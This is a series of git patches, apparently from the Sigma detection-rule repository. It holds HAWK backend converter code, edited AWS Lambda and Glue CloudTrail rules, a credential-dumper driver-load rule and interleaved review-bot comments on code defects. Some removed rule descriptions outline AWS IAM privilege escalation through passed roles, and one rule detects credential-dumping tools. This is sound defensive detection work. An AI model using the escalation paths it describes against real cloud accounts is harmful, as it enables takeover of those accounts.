tuple: + return self.generateMapItemNode(node, notNode) + elif type(node) in (str, int): + nodeRet = {"key": "", "description": "", "class": "column", "return": "str", "args": { "comparison": { "value": "regex" }, "str": { "value": "5" } } } + #key = next(iter(self.sigmaparser.parsedyaml['detection'])) + key = "payload" + + #nodeRet['key'] = self.cleanKey(key).lower() + nodeRet['key'] = key + + #print(node) + #print("KEY: ", key) + # they imply the entire payload + nodeRet['description'] = key + nodeRet['rule_id'] = str(uuid.uuid4()) + nodeRet['args']['str']['value'] = self.generateValueNode(node, False) + # return json.dumps(nodeRet) + return nodeRet + elif type(node) == list: + return self.generateListNode(node, notNode) + else: + raise TypeError("Node type %s was not expected in Sigma parse tree" % (str(type(node)))) + + def generateANDNode(self, node): + """ + generated = [ self.generateNode(val) for val in node ] + filtered = [ g for g in generated if g is not None ] + if filtered: + if self.sort_condition_lists: + filtered = sorted(filtered) + return self.andToken.join(filtered) + else: + return None + """ + ret = { "id" : "and", "key": "And", "children" : [ ] } + generated = [ self.generateNode(val) for val in node ] + filtered = [ g for g in generated if g is not None ] + if filtered: + if self.sort_condition_lists: + filtered = sorted(filtered) + ret['children'] = filtered + # return json.dumps(ret)# self.orToken.join(filtered) + return ret + else: + return None + + def generateORNode(self, node): + ret = { "id" : "or", "key": "Or", "children" : [ ] } + generated = [ self.generateNode(val) for val in node ] + filtered = [ g for g in generated if g is not None ] + if filtered: + if self.sort_condition_lists: + filtered = sorted(filtered) + ret['children'] = filtered + # return json.dumps(ret)# self.orToken.join(filtered) + return ret + else: + return None + + def generateSubexpressionNode(self, node): + generated = self.generateNode(node.items) + if 'len'in 
dir(node.items): # fix the "TypeError: object of type 'NodeSubexpression' has no len()" + if len(node.items) == 1: + # A sub expression with length 1 is not a proper sub expression, no self.subExpression required + return generated + if generated: + return json.loads(self.subExpression % json.dumps(generated)) + else: + return None + + def generateListNode(self, node, notNode=False): + if not set([type(value) for value in node]).issubset({str, int}): + raise TypeError("List values must be strings or numbers") + result = [self.generateNode(value, notNode) for value in node] + if len(result) == 1: + # A list with length 1 is not a proper list, no self.listExpression required + return result[0] + #print("LIST EXPRESSION") + #print(result) + return self.listExpression % (self.listSeparator.join(result)) + + def generateNOTNode(self, node): + generated = self.generateNode(node.item, True) + return generated + + def generateMapItemNode(self, node, notNode=False): + nodeRet = {"key": "", "description": "", "class": "column", "return": "str", "args": { "comparison": { "value": "=" }, "str": { "value": 5 } } } + if notNode: + nodeRet["args"]["comparison"]["value"] = "!=" + nodeRet['rule_id'] = str(uuid.uuid4()) + key, value = node + if self.mapListsSpecialHandling == False and type(value) in (str, int, list) or self.mapListsSpecialHandling == True and type(value) in (str, int): + nodeRet['key'] = self.cleanKey(key).lower() + nodeRet['description'] = key + if type(value) == str and "*" in value: + # value = value.replace("*", ".*") + value = value.replace("*", "") + if notNode: + nodeRet["args"]["comparison"]["value"] = "!regex" + else: + nodeRet['args']['comparison']['value'] = "regex" + nodeRet['args']['str']['value'] = value + # return "%s regex %s" % (self.cleanKey(key), self.generateValueNode(value, True)) + #return json.dumps(nodeRet) + return nodeRet + elif type(value) is str: + #return self.mapExpression % (self.cleanKey(key), self.generateValueNode(value, True)) + 
nodeRet['args']['str']['value'] = value + # return json.dumps(nodeRet) + return nodeRet + elif type(value) is int: + nodeRet['return'] = "int" + nodeRet['args']['int'] = { "value" : value } + del nodeRet['args']['str'] + #return self.mapExpression % (self.cleanKey(key), self.generateValueNode(value, True)) + #return json.dumps(nodeRet) + return nodeRet + else: + #return self.mapExpression % (self.cleanKey(key), self.generateNode(value)) + nodeRet['args']['str']['value'] = value + #return json.dumps(nodeRet) + return nodeRet + elif type(value) == list: + return self.generateMapItemListNode(key, value, notNode) + elif isinstance(value, SigmaTypeModifier): + return self.generateMapItemTypedNode(key, value) + elif value is None: + #return self.nullExpression % (key, ) + nodeRet['args']['str']['value'] = None + #return json.dumps(nodeRet) + return nodeRet + else: + raise TypeError("Backend does not support map values of type " + str(type(value))) + + def generateMapItemListNode(self, key, value, notNode=False): + ret = { "id" : "or", "key": "Or", "children" : [ ] } + for item in value: + nodeRet = {"key": "", "description": "", "class": "column", "return": "str", "args": { "comparison": { "value": "=" }, "str": { "value": "5" } } } + nodeRet['key'] = self.cleanKey(key).lower() + nodeRet['description'] = key + nodeRet['rule_id'] = str(uuid.uuid4()) + if item is None: + nodeRet['args']['str']['value'] = 'null' + ret['children'].append( nodeRet ) + elif type(item) == str and "*" in item: + item = item.replace("*", "") + # item = item.replace("*", ".*") + #print("item") + #print(item) + nodeRet['args']['str']['value'] = item # self.generateValueNode(item, True) + if notNode: + nodeRet["args"]["comparison"]["value"] = "!regex" + else: + nodeRet['args']['comparison']['value'] = "regex" + ret['children'].append( nodeRet ) + else: + #print("item2") + #print(item) + nodeRet['args']['str']['value'] = self.generateValueNode(item, True) + ret['children'].append( nodeRet ) + # 
return json.dumps(ret) # '('+" or ".join(itemslist)+')' + return ret # '('+" or ".join(itemslist)+')' + + def generateMapItemTypedNode(self, fieldname, value, notNode=False): + nodeRet = {"key": "", "description": "", "class": "column", "return": "str", "args": { "comparison": { "value": "=" }, "str": { "value": "5" } } } + nodeRet['key'] = self.cleanKey(fieldname).lower() + nodeRet['description'] = fieldname + nodeRet['rule_id'] = str(uuid.uuid4()) + if type(value) == SigmaRegularExpressionModifier: + regex = str(value) + """ + # Regular Expressions have to match the full value in QRadar + if not (regex.startswith('^') or regex.startswith('.*')): + regex = '.*' + regex + if not (regex.endswith('$') or regex.endswith('.*')): + regex = regex + '.*' + return "%s imatches %s" % (self.cleanKey(fieldname), self.generateValueNode(regex, True)) + """ + #print("ENDS WITH!!!") + nodeRet['args']['str']['value'] = self.generateValueNode(regex, True) + if notNode: + nodeRet["args"]["comparison"]["value"] = "!regex" + else: + nodeRet['args']['comparison']['value'] = "regex" + # return json.dumps(nodeRet) + return nodeRet + else: + raise NotImplementedError("Type modifier '{}' is not supported by backend".format(value.identifier)) + + def generateValueNode(self, node, keypresent): + """ + if keypresent == False: + return "payload regex \'{0}{1}{2}\'".format("%", self.cleanValue(str(node)), "%") + else: + return self.valueExpression % (self.cleanValue(str(node))) + """ + return self.valueExpression % (self.cleanValue(str(node))) + + def generateNULLValueNode(self, node): + # node.item + nodeRet = {"key": node.item, "description": node.item, "class": "column", "return": "str", "args": { "comparison": { "value": "=" }, "str": { "value": "null" } } } + nodeRet['rule_id'] = str(uuid.uuid4()) + # return json.dumps(nodeRet) + return nodeRet + + def generateNotNULLValueNode(self, node): + # return self.notNullExpression % (node.item) + return node.item + + def generateAggregation(self, 
agg, timeframe='00'): + if agg == None: + return "" + if agg.aggfunc == sigma.parser.condition.SigmaAggregationParser.AGGFUNC_NEAR: + raise NotImplementedError("The 'near' aggregation operator is not yet implemented for this backend") + if agg.groupfield == None: + s = "SELECT %s(%s) as agg_val from %s where" % (agg.aggfunc_notrans, self.cleanKey(agg.aggfield), self.aql_database) + s2 = " group by %s having agg_val %s %s" % (self.cleanKey(agg.aggfield), agg.cond_op, agg.condition) + raise NotImplementedError("The 'agg val' aggregation operator is not yet implemented for this backend: %s %s" % (s, s2)) + """ + elif agg.groupfield != None and timeframe == '00': + self.prefixAgg = " SELECT %s(%s) as agg_val from %s where " % (agg.aggfunc_notrans, self.cleanKey(agg.aggfield), self.aql_database) + self.suffixAgg = " group by %s having agg_val %s %s" % (self.cleanKey(agg.groupfield), agg.cond_op, agg.condition) + return self.prefixAgg, self.suffixAgg + elif agg.groupfield != None and timeframe != None: + for key, duration in self.generateTimeframe(timeframe).items(): + self.prefixAgg = " SELECT %s(%s) as agg_val from %s where " % (agg.aggfunc_notrans, self.cleanKey(agg.aggfield), self.aql_database) + self.suffixAgg = " group by %s having agg_val %s %s LAST %s %s" % (self.cleanKey(agg.groupfield), agg.cond_op, agg.condition, duration, key) + return self.prefixAgg, self.suffixAgg + else: + self.prefixAgg = " SELECT %s(%s) as agg_val from %s where " % (agg.aggfunc_notrans, self.cleanKey(agg.aggfield), self.aql_database) + self.suffixAgg = " group by %s having agg_val %s %s" % (self.cleanKey(agg.groupfield), agg.cond_op, agg.condition) + return self.prefixAgg, self.suffixAgg + """ + #print(agg) + raise NotImplementedError("The 'agg' aggregation operator is not yet implemented for this backend") + + def generateTimeframe(self, timeframe): + time_unit = timeframe[-1:] + duration = timeframe[:-1] + timeframe_object = {} + if time_unit == "s": + timeframe_object['seconds'] = 
int(duration) + elif time_unit == "m": + timeframe_object['minutes'] = int(duration) + elif time_unit == "h": + timeframe_object['hours'] = int(duration) + elif time_unit == "d": + timeframe_object['days'] = int(duration) + else: + timeframe_object['months'] = int(duration) + return timeframe_object + + def generate(self, sigmaparser): + """Method is called for each sigma rule and receives the parsed rule (SigmaParser)""" + #print(sigmaparser.parsedyaml) + #print(sigmaparser.condparsed) + for parsed in sigmaparser.condparsed: + query = self.generateQuery(parsed, sigmaparser) + before = self.generateBefore(parsed) + after = self.generateAfter(parsed) + + result = "" + if before is not None: + result = before + if query is not None: + result += query + if after is not None: + result += after + + return result + + def generateQuery(self, parsed, sigmaparser): + self.sigmaparser = sigmaparser + result = self.generateNode(parsed.parsedSearch) + self.parsedlogsource = sigmaparser.get_logsource().index + """ + if any("flow" in i for i in self.parsedlogsource): + aql_database = "flows" + else: + aql_database = "events" + """ + prefix = "" + ret = '[ { "id" : "and", "key": "And", "children" : [' + ret2 =" ] } ]" + """ + try: + mappedFields = [] + for field in sigmaparser.parsedyaml["fields"]: + mapped = sigmaparser.config.get_fieldmapping(field).resolve_fieldname(field, sigmaparser) + mappedFields.append(mapped) + if " " in mapped and not "(" in mapped: + prefix += ", \"" + mapped + "\"" + else: + prefix += ", " + mapped + + except KeyError: # no 'fields' attribute + mapped = None + pass + """ + + #if parsed.parsedAgg: #and timeframe == None: + # (prefix, suffixAgg) = self.generateAggregation(parsed.parsedAgg) + # result = prefix + result + # result += suffixAgg + #elif parsed.parsedAgg != None and timeframe != None: + # (prefix, suffixAgg) = self.generateAggregation(parsed.parsedAgg, timeframe) + # result = prefix + result + # result += suffixAgg + #else: + # result = 
prefix + result + + #print(result) + result = prefix + json.dumps(result) + + # print(sigmaparser.parsedyaml) + + analytic_txt = ret + result + ret2 # json.dumps(ret) + try: + analytic = json.loads(analytic_txt) # json.dumps(ret) + except Exception as e: + print("Failed to parse json: %s" % analytic_txt) + raise Exception("Failed to parse json: %s" % analytic_txt) + # "rules","filter_name","actions_category_name","correlation_action","date_added","scores/53c9a74abfc386415a8b463e","enabled","public","group_name","score_id" + + record = { + "rules" : analytic, # analytic_txt.replace('"','""'), + "filter_name" : sigmaparser.parsedyaml['title'], + "actions_category_name" : "Add (+)", + "correlation_action" : 5.00, + "date_added" : sigmaparser.parsedyaml['date'], + "enabled" : True, + "public" : True, + "group_name" : ".", + "score_id" : sigmaparser.parsedyaml['id'] + } + if not 'status' in self.sigmaparser.parsedyaml or 'status' in self.sigmaparser.parsedyaml and self.sigmaparser.parsedyaml['status'] != 'experimental': + record['correlation_action'] += 10.0; + if 'falsepositives' in self.sigmaparser.parsedyaml and len(self.sigmaparser.parsedyaml['falsepositives']) > 1: + record['correlation_action'] -= (2.0 * len(self.sigmaparser.parsedyaml['falsepositives']) ) + + if 'level' in self.sigmaparser.parsedyaml: + if self.sigmaparser.parsedyaml['level'].lower() == 'critical': + record['correlation_action'] += 15.0; + elif self.sigmaparser.parsedyaml['level'].lower() == 'high': + record['correlation_action'] += 10.0; + elif self.sigmaparser.parsedyaml['level'].lower() == 'medium': + record['correlation_action'] += 5.0; + elif self.sigmaparser.parsedyaml['level'].lower() == 'low': + record['correlation_action'] += 2.0; + + return json.dumps(record) From 503a4bc72b21db3c499dfeec4357086c3b90c81a Mon Sep 17 00:00:00 2001 
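Review bot: In generateMapItemNode the wildcard branch turns a Sigma value into a regex with `value = value.replace("*", "")` and no escaping, so regex metacharacters that are common in rule values (`\`, `.`, `(`, `+`, `?`, `$`) change meaning and a mid-string wildcard such as `a*b` collapses to the literal `ab`; generateMapItemListNode has the same `item.replace("*", "")`. The literal parts should be escaped and the wildcard mapped to a regex wildcard before the comparison is switched to `regex`, along the lines of `value = ".*".join(re.escape(p) for p in value.split("*"))` (assuming HAWK's regex dialect accepts Python-style escapes, which is worth confirming); otherwise affected rules silently stop matching rather than failing loudly. generateListNode joins the results of generateNode with `self.listSeparator.join(result)`, but for str/int items generateNode returns a dict, so any keyword list with more than one entry raises TypeError. generateQuery reads `sigmaparser.parsedyaml['date']` and `['id']` unguarded while `status`, `level` and `falsepositives` are checked with `in`; `.get()` with a default or an explicit error message would turn a missing optional field into a clear failure instead of a bare KeyError, and `raise Exception(...) from e` in the json.loads handler would keep the original parse error attached.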
From: Austin Songer Date: Wed, 13 Oct 2021 12:27:24 -0500 Subject: [PATCH 1224/1367] Update and rename aws_pass_role_to_lambda_function.yml to aws_lambda_function_created_or_invoked.yml --- ...yml => aws_lambda_function_created_or_invoked.yml} | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) rename rules/cloud/aws/{aws_pass_role_to_lambda_function.yml => aws_lambda_function_created_or_invoked.yml} (55%) diff --git a/rules/cloud/aws/aws_pass_role_to_lambda_function.yml b/rules/cloud/aws/aws_lambda_function_created_or_invoked.yml similarity index 55% rename from rules/cloud/aws/aws_pass_role_to_lambda_function.yml rename to rules/cloud/aws/aws_lambda_function_created_or_invoked.yml index f8047050..e49d07cb 100644 --- a/rules/cloud/aws/aws_pass_role_to_lambda_function.yml +++ b/rules/cloud/aws/aws_lambda_function_created_or_invoked.yml @@ -1,9 +1,10 @@ -title: AWS Passed Role to Lambda Function +title: AWS Lambda Function Created or Invoked id: d914951b-52c8-485f-875e-86abab710c0b -description: Detects when an user with these permissions could escalate privileges by passing an existing IAM role to a new Lmbda function that includes code to import the AWS library to their programming lanugage. This can give access to the privileges associated with any Lambda service role that exists in the account and escalate to full administrator access to the account. +description: Detects when an user creates or invokes a lambda function. author: Austin Songer @austinsonger status: experimental date: 2021/10/03 +update: 2021/10/13 references: - https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/ logsource: 
@@ -14,12 +15,12 @@ detection: eventName: CreateFunction selection2: eventSource: lambda.amazonaws.com - eventName: InvokeFunction - condition: selection1 and selection2 + eventName: Invoke +condition: selection1 and selection2 level: low tags: - attack.privilege_escalation - attack.t1078 falsepositives: - - Passed Role to New Lambda Function may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Lambda Function created or invoked may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - If known behavior is causing false positives, it can be exempted from the rule. From f7dba3fbffcfa311471e24011939abe4313c6f18 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 13 Oct 2021 12:34:16 -0500 Subject: [PATCH 1225/1367] Update passed_role_to_glue_development_endpoint.yml --- .../passed_role_to_glue_development_endpoint.yml | 15 +++++++++++---- 1 file changed, 11 insertions(+), 4 deletions(-) diff --git a/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml b/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml index d22ebd8b..c8b3372e 100644 --- a/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml +++ b/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml 
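Review bot: The `condition:` line is moved to column 0 in this hunk (`+condition: selection1 and selection2`), which takes it out of the `detection` map, so the rule no longer has a condition where the parser looks for it; the passed_role_to_glue_development_endpoint.yml hunk `@@ -13,10 +14,16 @@` in the next commit de-indents its condition the same way. The condition also requires `selection1 and selection2` in a single event, but a CloudTrail record carries one eventName, so `CreateFunction` and `Invoke` can never both match and the rule cannot fire as written; if both events are meant to be caught it should read `  condition: selection1 or selection2` under `detection`, and if the sequence is meant it needs a correlation rather than a boolean `and`. The `attack.privilege_escalation` and `attack.t1078` tags are unchanged while the description now covers any create or invoke, so the tagging no longer appears to describe what the rule detects.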
@@ -1,9 +1,10 @@ -title: AWS Passed Role to Glue Development Endpoint +title: AWS Glue Development Endpoint Activity id: 4990c2e3-f4b8-45e3-bc3c-30b14ff0ed26 -description: Detects when an user these permissions could create a new AWS Glue development endpoint and pass an existing service role to it. They then could SSH into the instance and use the AWS CLI to have access of the permissions the role has access to. The adversary could gain privileges associated with any Glue service role that exists in the account, which could range from no privilege escalation to full administrator access to the account. +description: Detects possible suspicious glue development endpoint activity. author: Austin Songer @austinsonger status: experimental date: 2021/10/03 +update: 2021/10/13 references: - https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/ - https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html @@ -13,10 +14,16 @@ detection: selection1: eventSource: glue.amazonaws.com eventName: CreateDevEndpoint - condition: selection1 + selection2: + eventSource: glue.amazonaws.com + eventName: DeleteDevEndpoint + selection3: + eventSource: glue.amazonaws.com + eventName: UpdateDevEndpoint +condition: selection1 or selection2 or selection3 level: low tags: - attack.privilege_escalation falsepositives: - - Passed Role to Glue Development Endpoint may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Glue Development Endpoint Activity may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - If known behavior is causing false positives, it can be exempted from the rule. From 40879252a8e3a34759ce134fb1b336bab3901193 Mon Sep 17 00:00:00 2001 
From: Austin Songer Date: Wed, 13 Oct 2021 16:25:28 -0500 Subject: [PATCH 1226/1367] Update aws_lambda_function_created_or_invoked.yml --- rules/cloud/aws/aws_lambda_function_created_or_invoked.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws/aws_lambda_function_created_or_invoked.yml b/rules/cloud/aws/aws_lambda_function_created_or_invoked.yml index e49d07cb..6c53fd99 100644 --- a/rules/cloud/aws/aws_lambda_function_created_or_invoked.yml +++ b/rules/cloud/aws/aws_lambda_function_created_or_invoked.yml @@ -16,7 +16,7 @@ detection: selection2: eventSource: lambda.amazonaws.com eventName: Invoke -condition: selection1 and selection2 +condition: selection1 | near selection2 level: low tags: - attack.privilege_escalation From 468cac031d405b6ddf9355d84e3015a2c10d719c Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 14 Oct 2021 07:19:41 +0200 Subject: [PATCH 1227/1367] fix status --- tools/sigma/filter.py | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/tools/sigma/filter.py b/tools/sigma/filter.py index f33b5f0b..b99be7c0 100644 --- a/tools/sigma/filter.py +++ b/tools/sigma/filter.py @@ -24,7 +24,9 @@ class SigmaRuleFilter: "high" : 2, "critical" : 3 } - STATES = ["experimental", "testing", "stable"] + STATES = ["experimental", + "test", + "stable"] def __init__(self, expr): self.minlevel = None From 55f942b526f51ca22cfa30bd58d4a5bd76fff656 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Thu, 14 Oct 2021 08:53:50 +0200 Subject: [PATCH 1228/1367] fix: change error message --- tests/test_rules.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tests/test_rules.py b/tests/test_rules.py index 2e6e0769..6d10f80e 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py 
@@ -170,7 +170,7 @@ class TestRules(unittest.TestCase): key_iterator(detection, faulty_fieldnames) self.assertEqual(faulty_fieldnames, [], Fore.RED + - "There are rules with an unsupported field name. Spaces are not allowed. (Replace space with an underscore character if the log source uses space)") + "There are rules with an unsupported field name. Spaces are not allowed. (Replace space with an underscore character '_' )") def test_single_named_condition_with_x_of_them(self): faulty_detections = [] From a7e6eb576c1b1e4142e6bfa212ed721a67d2158b Mon Sep 17 00:00:00 2001 From: Tran Trung Hieu Date: Thu, 14 Oct 2021 15:55:05 +0400 Subject: [PATCH 1229/1367] Delete .DS_Store file --- .DS_Store | Bin 8196 -> 0 bytes 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 .DS_Store diff --git a/.DS_Store b/.DS_Store deleted file mode 100644 index 30ea1bff625721dfd93203ca5da6e267b24ba887..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 8196 zcmeHMzl#$=6n=B&mnhuXNXivNZS=g-ZtsY#%^`@5n#++BlG~7MY_!qz4($??I%x2&04>=nVb|%ccW!`)9ee+GS%i9o<+L#a4h`L17L1(*i z3`0p{KleggvNNY)74m5`T-)4=#*;#%pYRHJ1-t@Y0k42p;D1p7&ung;is!!Z`q3-k z6{w{Ge18bg*@o68#_C%K23-QcHZZLlu2=X1Hn29dHZc|+G-Xm@O{%gbhBE1x4{Tg$ zZDOoRCuNHdWs#MwP?Sc;`hgB76&mYDuYgyer~udQ4Z1)>x=pdH-__Mu-=uFG^?LnL z)W=-s&5g$g-M!E2u7B`H|70h7H=wTTR|M@8mv(4QeTfcI%UC@ZAvv6Su=M5UuTRXO z5S1~hj*@)rJ*!Py6wxllG=&;DKEpE_$%&AB?mvxFO>*muql`~=l*{J{z^DZlW4eX2 z*`}GJ&g$N?ykBy8ai^VXRK++vR(~*$CRB-WM%y%XShV){U9aTuVfkpvLF7vY z%ibo@%H(BV7D+hncfVVF>y`NHZy!ngMMU;nE01vS_3<(V-@F2~Q{af%ahL0V z{L-u5|JP0zzhSRHofJ@w-ezwDJ609D=2|;IzlqL`;}Tof2}{S^2OW??@L From 7e02555e22213c6ce0bc04a399fb6f247cafdfa5 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Thu, 14 Oct 2021 14:24:56 +0200 Subject: [PATCH 1230/1367] refactor: credential dumper level increased --- rules/windows/driver_load/driver_load_mal_creddumper.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) 
diff --git a/rules/windows/driver_load/driver_load_mal_creddumper.yml b/rules/windows/driver_load/driver_load_mal_creddumper.yml index 5ff88625..76fb665b 100644 --- a/rules/windows/driver_load/driver_load_mal_creddumper.yml +++ b/rules/windows/driver_load/driver_load_mal_creddumper.yml @@ -6,7 +6,7 @@ related: description: Detects well-known credential dumping tools execution via service execution events author: Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community date: 2017/03/05 -modified: 2021/09/21 +modified: 2021/10/14 references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment tags: @@ -37,4 +37,4 @@ detection: condition: selection falsepositives: - Legitimate Administrator using credential dumping tool for password recovery -level: high +level: critical From 1a9f106d3449cadcd3cbeffc4ff1415280459cbe Mon Sep 17 00:00:00 2001 From: Tim Shelton Date: Thu, 14 Oct 2021 14:17:03 +0000 Subject: [PATCH 1231/1367] Initial commmit of hawk analytic score generator --- tools/sigma/backends/hawk.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/sigma/backends/hawk.py b/tools/sigma/backends/hawk.py index b2a775be..0bfe6192 100644 --- a/tools/sigma/backends/hawk.py +++ b/tools/sigma/backends/hawk.py @@ -376,7 +376,7 @@ class HAWKBackend(SingleTextQueryBackend): #print(result) result = prefix + json.dumps(result) - # print(sigmaparser.parsedyaml) + print(sigmaparser.parsedyaml) analytic_txt = ret + result + ret2 # json.dumps(ret) try: From 6d6a57a3b436eb6a6a29f6389ae7e284e8f0d781 Mon Sep 17 00:00:00 2001 From: Tim Shelton Date: Thu, 14 Oct 2021 15:05:05 +0000 Subject: [PATCH 1232/1367] Add additional information to the analytic record, including tags, author info, rule id and references --- tools/sigma/backends/hawk.py | 23 ++++++++++++++++++++++- tools/sigma/sigmac.py | 3 ++- 2 files changed, 24 insertions(+), 2 deletions(-) 
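Review bot: Uncommenting `print(sigmaparser.parsedyaml)` in generateQuery sends the whole parsed rule to stdout on every conversion, and sigmac writes the converted query to the same stream, so the backend's JSON output becomes interleaved with debug text that consumers cannot parse. If the dump is needed it should go through the module logger at debug level, e.g. `logger.debug("parsed rule: %s", sigmaparser.parsedyaml)`, rather than a bare print. generateQuery starts and ends outside the hunk.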
diff --git a/tools/sigma/backends/hawk.py b/tools/sigma/backends/hawk.py index 0bfe6192..9d0e0611 100644 --- a/tools/sigma/backends/hawk.py +++ b/tools/sigma/backends/hawk.py @@ -376,7 +376,7 @@ class HAWKBackend(SingleTextQueryBackend): #print(result) result = prefix + json.dumps(result) - print(sigmaparser.parsedyaml) + #print(sigmaparser.parsedyaml) analytic_txt = ret + result + ret2 # json.dumps(ret) try: @@ -386,6 +386,23 @@ class HAWKBackend(SingleTextQueryBackend): raise Exception("Failed to parse json: %s" % analytic_txt) # "rules","filter_name","actions_category_name","correlation_action","date_added","scores/53c9a74abfc386415a8b463e","enabled","public","group_name","score_id" + cmt = "Sigma Rule: %s\n" % sigmaparser.parsedyaml['id'] + cmt += "Author: %s\n" % sigmaparser.parsedyaml['author'] + cmt += "Level: %s\n" % sigmaparser.parsedyaml['level'] + if 'falsepositives' in sigmaparser.parsedyaml and type(sigmaparser.parsedyaml['falsepositives']) is list: + if len(sigmaparser.parsedyaml['falsepositives']) > 0: + cmt += "False Positives: " + for v in sigmaparser.parsedyaml['falsepositives']: + if v: + cmt += "%s, " % v + else: + cmt += "None, " + cmt = cmt[:-2] + "\n" + elif 'falsepositives' in sigmaparser.parsedyaml and sigmaparser.parsedyaml['falsepositives']: + raise Exception("Unknown type for false positives: ", type(sigmaparser.parsedyaml['falsepositives'])) + + if 'references' in sigmaparser.parsedyaml: + cmt += "References: \n%s" % "\n".join(sigmaparser.parsedyaml['references']) record = { "rules" : analytic, # analytic_txt.replace('"','""'), "filter_name" : sigmaparser.parsedyaml['title'], 
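Review bot: `sigmaparser.parsedyaml['author']` and `sigmaparser.parsedyaml['level']` are indexed unguarded in the new comment-building lines, while `falsepositives` and `references` in the same hunk (and `level` in the scoring code elsewhere in this function) are checked with `in`, so a rule without an author or level now fails with a KeyError instead of producing a record; `sigmaparser.parsedyaml.get('author', '')` and `.get('level', '')` keep the comment consistent with the rest of the function. The `raise Exception("Unknown type for false positives: ", type(...))` passes two arguments, so the message renders as a tuple; `raise TypeError("Unknown type for false positives: %s" % type(sigmaparser.parsedyaml['falsepositives']))` gives a readable error of the type sigmac already catches. The remainder of generateQuery is outside the hunk.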
@@ -394,9 +411,13 @@ class HAWKBackend(SingleTextQueryBackend): "date_added" : sigmaparser.parsedyaml['date'], "enabled" : True, "public" : True, + "comments" : cmt, "group_name" : ".", "score_id" : sigmaparser.parsedyaml['id'] } + if 'tags' in sigmaparser.parsedyaml: + record["tags"] = sigmaparser.parsedyaml['tags'] + if not 'status' in self.sigmaparser.parsedyaml or 'status' in self.sigmaparser.parsedyaml and self.sigmaparser.parsedyaml['status'] != 'experimental': record['correlation_action'] += 10.0; if 'falsepositives' in self.sigmaparser.parsedyaml and len(self.sigmaparser.parsedyaml['falsepositives']) > 1: diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py index 27f07a0c..6a153a6f 100755 --- a/tools/sigma/sigmac.py +++ b/tools/sigma/sigmac.py @@ -22,7 +22,7 @@ import ruamel.yaml import json import pathlib import itertools -import logging +import logging, traceback from sigma.parser.collection import SigmaCollectionParser from sigma.parser.exceptions import SigmaCollectionParseError, SigmaParseError from sigma.configuration import SigmaConfiguration, SigmaConfigurationChain @@ -368,6 +368,7 @@ def main(): sys.exit(error) except (NotImplementedError, TypeError) as e: print("An unsupported feature is required for this Sigma rule (%s): " % (sigmafile) + str(e), file=sys.stderr) + traceback.print_exc() logger.debug("* Convertion Sigma input %s FAILURE" % (sigmafile)) success = False if not cmdargs.ignore_backend_errors: From 70b55f2c2d6fcab3e97495e2f6eaa7c980d9a6f4 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 14 Oct 2021 12:10:29 -0500 Subject: [PATCH 1233/1367] Update aws_lambda_function_created_or_invoked.yml --- rules/cloud/aws/aws_lambda_function_created_or_invoked.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws/aws_lambda_function_created_or_invoked.yml b/rules/cloud/aws/aws_lambda_function_created_or_invoked.yml index 6c53fd99..669ca76c 100644 
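Review bot: The added `traceback.print_exc()` inside `main()`'s `except (NotImplementedError, TypeError)` handler prints a full Python traceback to stderr for every unsupported rule regardless of configured verbosity, turning an expected and already-reported condition into noise on batch conversions. The module-level `logger` used on the very next line can carry the stack trace only when debug logging is enabled: `logger.debug("* Convertion Sigma input %s FAILURE" % (sigmafile), exc_info=True)`. That makes the `traceback` import unnecessary; if it stays, split `import logging, traceback` into one import per line as the surrounding import block does. `main()` continues outside the hunk.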
--- a/rules/cloud/aws/aws_lambda_function_created_or_invoked.yml +++ b/rules/cloud/aws/aws_lambda_function_created_or_invoked.yml @@ -16,7 +16,7 @@ detection: selection2: eventSource: lambda.amazonaws.com eventName: Invoke -condition: selection1 | near selection2 + condition: selection1 | near selection2 level: low tags: - attack.privilege_escalation From 7ad08877042de90fb62100f4957f92a3da952e5a Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 14 Oct 2021 12:10:48 -0500 Subject: [PATCH 1234/1367] Update passed_role_to_glue_development_endpoint.yml --- rules/cloud/aws/passed_role_to_glue_development_endpoint.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml b/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml index c8b3372e..c43ce53e 100644 --- a/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml +++ b/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml @@ -20,7 +20,7 @@ detection: selection3: eventSource: glue.amazonaws.com eventName: UpdateDevEndpoint -condition: selection1 or selection2 or selection3 + condition: selection1 or selection2 or selection3 level: low tags: - attack.privilege_escalation From 231b54e526bdfb2d991f0062e4c5d6621b3e4dd7 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 15 Oct 2021 14:39:32 